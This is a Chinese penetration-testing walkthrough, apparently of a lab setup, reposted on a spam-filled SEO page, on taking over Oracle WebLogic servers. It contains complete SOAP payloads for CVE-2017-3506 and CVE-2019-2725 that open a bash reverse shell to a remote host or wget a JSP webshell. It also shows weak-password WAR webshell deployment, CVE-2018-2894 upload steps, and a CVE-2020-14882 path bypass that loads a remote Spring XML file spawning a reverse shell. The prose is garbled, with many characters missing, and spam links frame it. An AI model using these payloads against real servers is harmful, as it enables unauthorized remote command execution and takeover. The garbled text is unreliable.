当前位置: 首页 > wzjs >正文

海口网站建设解决方案网址链接查询

海口网站建设解决方案,网址链接查询,嘉鱼网站建设前十,wordpress语言文件​​​​​​后台弱⼝令GetShell 通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell 使用弱口令登录 ,weblogic/Oracle123 点击部署->安装 点击上载文件 点击选择文件,两个都可以 使用Godzilla哥斯拉生成jsp木马写入1.jsp文件,再将此…

​​​​​​后台GetShell

 通过弱令进⼊后台, 传部war, getshell

使用弱口令登录 ,weblogic/Oracle@123

点击部署->安装 

点击上载文件 

点击选择文件,两个都可以 

 使用Godzilla哥斯拉生成jsp木马写入1.jsp文件,再将此文件压缩成zip文件,将此时的1.zip改为1.war

之后使用http://39.105.61.160:7001/1/1.jsp就可以访问到,可以使用此地址使用哥斯拉连接 

CVE-2017-3506

XMLDecoder列化漏洞,WeblogicWLS Security组件对外供了webserver服务中使XMLDecoder来解析户输XML数据解析列化导致任意令执

访问http://39.105.61.160:7001/wls-wsat/CoordinatorPortType可以判断wls-wsat组件是否存在

 在此页面用Burp抓包

监听8888端口 

 发送到重放器修改Content-Type: text/xml,右键修改请求方法,改为POST请求方法,将下面的代码改为自己服务器ip和监听的端口

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/39.105.61.160/8888&gt;&amp;1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 点击发送,成功监听到

 CVE-2019-2725

wls9-async等组件为WebLogic Server步通认应WebLogic WAR在反序列化时存在缺攻击者通过发送精构造恶意 HTTP 即可获标服在未远程执命令

访问http://39.105.61.160:7001/_async/AsyncResponseService出现图中情况,说明漏洞存在

在此页面进行抓包 

将之前的1.jsp文件放到自己服务器的根目录,改名为1.txt 

发送到重放器修改Content-Type: text/xml,右键修改请求方法,改为POST请求方法,将下面的代码改为自己服务器ip和文件名称

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://39.105.61.160/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

代码的大致意思是将自己服务器的1.txt文件下载到靶场并命名为678.jsp 

访问http://39.105.61.160:7001/bea_wls_internal/678.jsp就可以访问到,之后可以使用哥斯拉连接 

​​​​​​​CVE-2018-2628

WebLogic T3协议反列化命令执(CVE-2018- 2628)

Weblogic Server中RMI 通信使T3协议Weblogic Server和其它Java程序户端或者其它 Weblogic Server之间传输数据, 例会跟踪接到程序Java虚拟JVM,T3协议通信连, 传输Java虚拟. T3协议在开WebLogic控制台攻击以通过T3协议发送恶意的的列化数据, ⾏反列化, 对存weblogic远程代⾏攻击

使用工具Java反序列化漏洞利用工具V1.7.jar

 ​​​​​​CVE-2018-2894

WebLogic件任意漏洞,Weblogic Web Service Test Page处任意漏洞Web Service Test Page ""所以漏洞定限制

通过日志寻找密码 

docker-compose logs | grep password

 base-domain -> ⾼级 -> 启动Web服务测试⻚

 点击保存 , 进⼊ config.do ⽂件进⾏设置,将工作目录修改

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w  ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

保存后,点击安全 , 点击添加 

将之前的1.jsp放入 

提交后,按F12,找到1.jsp的代码,发现文件命名规则

 通过http://39.105.61.160:7001/ws_utc/css/config/keystore/1742720661348_1.jsp就可以访问,也可以使用哥斯拉连接

CVE-2020-14882

WebLogic远程漏洞,

CVE-2020-14882   远程过管控制件中

CVE-2020-14883   过身户在管控制⾏任何

使两个远程攻击者可通过 HTTP Oracle WebLogic ⾏任意命并完全控制主

使⽤以下url绕过登录认证,多试几次

​​​​​​​​​​​http://39.105.61.160:7001/console/css/%252e%252e%252fconsole.portal

%252e%252e%252是../的url编码 ,使用../的回溯,回到控制台首页

监听6666端口 

 ​​​​​​​

 在自己服务器上新建1.xml,改为自己的ip,端口,监听的端口

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/39.105.61.160/6666 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>

 

将网站打开

 访问下面网址

http://39.105.61.160:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://39.105.61.160/1.xml")

成功反弹shell 

 

 


文章转载自:

http://dbmhDrLA.yckwt.cn
http://Dvu7rWIJ.yckwt.cn
http://BIayd7C9.yckwt.cn
http://E3ioyyNH.yckwt.cn
http://IdAYxRYG.yckwt.cn
http://T9hRnVGM.yckwt.cn
http://S9q4dYhw.yckwt.cn
http://remYCimw.yckwt.cn
http://I2PGm0x5.yckwt.cn
http://SfTqdNNt.yckwt.cn
http://gT5xY4W1.yckwt.cn
http://QNMREOI5.yckwt.cn
http://uooGHt1Y.yckwt.cn
http://gNZq0sDS.yckwt.cn
http://phhIwRNh.yckwt.cn
http://jxMFrViC.yckwt.cn
http://3ZGtYyJP.yckwt.cn
http://VZTWbc2U.yckwt.cn
http://knt0P5Vv.yckwt.cn
http://UGwLp0Da.yckwt.cn
http://65c5sLjZ.yckwt.cn
http://CZFPTvst.yckwt.cn
http://CL2GDhbI.yckwt.cn
http://eR00nokK.yckwt.cn
http://CwcKLMaf.yckwt.cn
http://O183loSX.yckwt.cn
http://HfEVF3RS.yckwt.cn
http://HSKBIUAY.yckwt.cn
http://rQzJgP7V.yckwt.cn
http://LPM41PSw.yckwt.cn
http://www.dtcms.com/wzjs/656321.html

相关文章:

  • 备案之后怎样把 放到网站上做网站需要后端吗
  • 玖云建站系统郑州seo询搜点网络效果佳
  • 安徽工程建设官方网站沈阳德泰诺网站建设公司
  • 湖南做网站 e磐石网络斗破苍穹制作公司
  • 网站搜索出来有图片二级建造师证件查询全国联网
  • 做境外的网站网站违法么在线制作带字图片
  • 运营一个网站的成本长春网络建站
  • 深圳网站设计按天收费有名的网站建设
  • vue做购物网站WordPress一键采集插件
  • 做公众号app 网站 app做网批有专门的网站吗?
  • 做商城网站的项目背景图片指数分布
  • 旅行社网站建设方案论文网站制作资讯
  • 网站访问统计 曲线图中企动力大连分公司
  • dedecms双语网站做任务兼职赚钱的网站
  • 深圳服务网站设计哪家公司好wordpress的用途
  • 企业门户网站框架设计中关村报价大全手机
  • 网站开发使用框架原因宿迁盐城网站建设企业
  • 雪亮工程建设网站界面软件开发找谁
  • 什么是网站建设的建议百度推广电话销售话术
  • 黄石网站设计公司深圳有名的室内设计公司
  • c 网站开发wordpress编辑器段间距
  • 专业微信网站建设门户网站建设和检务公开整改
  • 网站生成手机端外贸网站开发开发
  • 企业网站建设费属于办公费吗网络平台管理制度
  • 做音乐网站多少钱做的好的营销型网站有哪些
  • 建个地方门户网站要多少钱怎么建设企业网站
  • 菏泽市建设职工培训中心网站手机网站如何做
  • 个人网站 做啥好WordPress用页面写文章
  • 上海专业网站建设报设计的比较好的网站
  • 花钱做网站需要所有权厦门网站排名优化费用